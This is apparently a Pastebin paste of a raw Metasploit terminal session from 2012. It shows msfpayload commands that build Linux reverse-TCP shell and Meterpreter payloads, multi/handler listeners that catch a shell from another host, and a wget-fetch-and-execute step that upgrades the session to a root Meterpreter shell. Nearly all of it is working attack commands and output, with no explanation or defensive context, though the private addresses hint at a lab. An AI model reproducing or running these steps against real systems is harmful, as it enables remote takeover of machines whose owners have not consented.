Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- root@bt:~# clear
- root@bt:~# msfpayload linux/meterpreter/reverse_tcp LHOST=10.254.254.107 LPORT=1337 X > /root/out
- Invalid payload: linux/meterpreter/reverse_tcp
- root@bt:~# msfpayload linux/x86/meterpreter/reverse_tcp LHOST=10.254.254.107 LPORT=1337 X > /root/out
- Created by msfpayload (http://www.metasploit.com).
- Payload: linux/x86/meterpreter/reverse_tcp
- Length: 50
- Options: {"LHOST"=>"10.254.254.107", "LPORT"=>"1337"}
- root@bt:~# msfpayload linux/x86/shell/reverse_tcp LHOST=10.254.254.107 LPORT=4444 X > /root/test
- Created by msfpayload (http://www.metasploit.com).
- Payload: linux/x86/shell/reverse_tcp
- Length: 50
- Options: {"LHOST"=>"10.254.254.107", "LPORT"=>"4444"}
- root@bt:~# msfconsole
- IIIIII dTb.dTb _.---._
- II 4' v 'B .'"".'/|`.""'.
- II 6. .P : .' / | `. :
- II 'T;. .;P' '.' / | `.'
- II 'T; ;P' `. / | .'
- IIIIII 'YvP' `-.__|__.-'
- I love shells --egypt
- =[ metasploit v4.2.0-dev [core:4.2 api:1.0]
- + -- --=[ 798 exploits - 440 auxiliary - 148 post
- + -- --=[ 246 payloads - 27 encoders - 8 nops
- =[ svn r14672 updated today (2012.02.01)
- msf > use multi/handler
- msf exploit(handler) > set LHOST 0.0.0.0
- LHOST => 0.0.0.0
- msf exploit(handler) > set LPORT 1337
- LPORT => 1337
- msf exploit(handler) > set PAYLOAD linux/x86/shell/reverse_tcp
- PAYLOAD => linux/x86/shell/reverse_tcp
- msf exploit(handler) > exploit -j
- [*] Exploit running as background job.
- [*] Started reverse handler on 0.0.0.0:1337
- [*] Starting the payload handler...
- msf exploit(handler) > [*] Sending stage (36 bytes) to 10.254.254.87
- [*] Command shell session 1 opened (10.254.254.107:1337 -> 10.254.254.87:58809) at 2012-02-01 13:18:46 +0000
- msf exploit(handler) > sessions
- Active sessions
- ===============
- Id Type Information Connection
- -- ---- ----------- ----------
- 1 shell linux 10.254.254.107:1337 -> 10.254.254.87:58809
- msf exploit(handler) > set LPORT 4444
- LPORT => 4444
- msf exploit(handler) > set PAYLOAD linux/x86/meterpreter/reverse_tcp
- PAYLOAD => linux/x86/meterpreter/reverse_tcp
- msf exploit(handler) > exploit -j
- [*] Exploit running as background job.
- [*] Started reverse handler on 0.0.0.0:4444
- [*] Starting the payload handler...
- msf exploit(handler) > sessions -i 1
- [*] Starting interaction with 1...
- ls
- Desktop
- Documents
- Downloads
- Firefox_wallpaper.png
- Music
- Pictures
- Public
- Templates
- Videos
- examples.desktop
- out
- uname -a
- Linux zY0D0X 2.6.38-8-generic #42-Ubuntu SMP Mon Apr 11 03:31:24 UTC 2011 x86_64 x86_64 x86_64 GNU/Linux
- wget http://10.254.254.107/test
- --2012-02-01 13:20:23-- http://10.254.254.107/test
- Connecting to 10.254.254.107:80... connected.
- HTTP request sent, awaiting response... 200 OK
- Length: 134 [text/plain]
- Saving to: `test'
- 0K 100% 12.5M=0s
- 2012-02-01 13:20:23 (12.5 MB/s) - `test' saved [134/134]
- chmod 755 test
- ./test &
- [*] Transmitting intermediate stager for over-sized stage...(100 bytes)
- [*] Sending stage (1126400 bytes) to 10.254.254.87
- [*] Meterpreter session 2 opened (10.254.254.107:4444 -> 10.254.254.87:54780) at 2012-02-01 13:20:40 +0000
- exit
- [*] Command shell session 1 closed. Reason: Died from EOFError
- msf exploit(handler) > sessions
- Active sessions
- ===============
- Id Type Information Connection
- -- ---- ----------- ----------
- 2 meterpreter x86/linux uid=0, gid=0, euid=0, egid=0, suid=0, sgid=0 @ zY0D0X 10.254.254.107:4444 -> 10.254.254.87:54780
- msf exploit(handler) > sessions -i 2
- [*] Starting interaction with 2...
- meterpreter >
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement